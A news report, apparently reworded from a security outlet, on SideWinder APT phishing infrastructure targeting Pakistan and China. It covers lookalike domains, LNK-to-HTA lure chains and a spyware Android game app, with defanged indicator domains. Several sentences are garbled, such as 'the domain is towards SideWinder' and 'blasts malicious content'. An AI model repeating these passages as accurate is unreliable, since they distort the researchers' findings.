Cybersecurity researchers have uncovered a previously undocumented attack infrastructure used by productive, state-sponsored groups Sidewinder to attack entities located in Pakistan and China.
It comprises a network of 55 domains and IP addresses used by threat actors, cybersecurity firms Group-IB and Bridewell said in a joint report shared with The Hacker News.
“The identified phishing domains impersonate various organizations in the news, government, telecommunications and financial sectors,” researchers Nikita Rostovtsev, Joshua Penny and Yashraj Solanki said.
SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to gain a foothold into targeted environments.
The group’s target range is widely believed to be linked to Indian espionage interests. The countries most frequently attacked include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar and Singapore.
Earlier this February, Group-IB disclosed evidence that SideWinder may have targeted 61 government, military, law enforcement and other organizations across Asia between June and November 2021.
Recently, nation-state groups were observed utilizing a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.
The newly discovered domain mimics government organizations in Pakistan, China, and India and is tagged with the use of the same values in WHOIS records and similar registration information.
Hosted on some of these domains are government-themed lure documents designed to download unknown next-stage payloads.
Most of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One of them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which QiAnXin and BlackBerry have analyzed in recent months.
Also found were Windows shortcut files (LNK) uploaded to VirusTotal from Beijing in late November 2022. LNK files were, for their part, engineered to run HTML application files (HTA) retrieved from a remote server that spoofed Tsinghua University email systems (mailtsinghua. sinacn(.)co).
Another LNK file uploaded to VirusTotal around the same time from Kathmandu used a similar method to retrieve an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov(.)org).
Further investigation of SideWinder’s infrastructure led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.
The rogue Android app is considered a “Ludo Game” and asks the user to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.
Group-IB said the app also showed similarities to a fake Secure VPN app that the company disclosed in June 2022 as being distributed to targets in Pakistan through a traffic routing (TDS) system called AntiBot.
Overall, the domain is towards SideWinder which directs its attention to financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.
“Like many other APT groups, SideWinder relies on targeted spear-phishing as an initial vector,” the researchers said. “That’s why it’s important for organizations to implement a business email protection solution that blasts malicious content.”